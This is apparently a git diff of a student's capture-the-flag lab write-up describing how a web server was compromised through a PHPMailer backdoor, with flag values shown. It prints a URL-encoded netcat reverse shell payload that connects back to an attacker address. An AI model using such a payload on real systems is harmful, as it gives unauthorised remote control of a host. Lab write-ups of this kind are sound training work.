rossmintzer11/UPenn-Cyber-Final-Project/OffensiveTemplate.md

   Then I found a vendor directory and found a flag inside ofthe PATH file

-  - flag2{6a8ed560f0b5358ecf844108048eb337}
+- found information on version
-    -found information on version
+- screenshot
-    -screenshot
+- found information on cves
-    -found information on cves
+- Based on information provided I decided to use the backdoor exploit on the phpmailer
-    -usew the backdoor exploit on the phpmailer -gainer reverse shell on netcat
+- gained reverse shell on netcat
-      -used a url encoded reverse shell
+- used a url encoded reverse shell
-      -cmd=nc%20<192.168.1.115>%204444%20-e%20/bin/bash
+  - cmd=nc%20<192.168.1.115>%204444%20-e%20/bin/bash
-      -screenshot
+  - screenshot
-      -traversed directories and found flag2
+  - -traversed directories and found flag2

-  -flag 3 flag3{a0f568aa9de277887f37730d71520d9b}
+### flag 3 flag3{a0f568aa9de277887f37730d71520d9b}
   -find /var/www -type f -iname 'flag*'
   -this leads us to a png file
   - we setup a simple http server insid the directory of the flagto download to the file to my attacking machine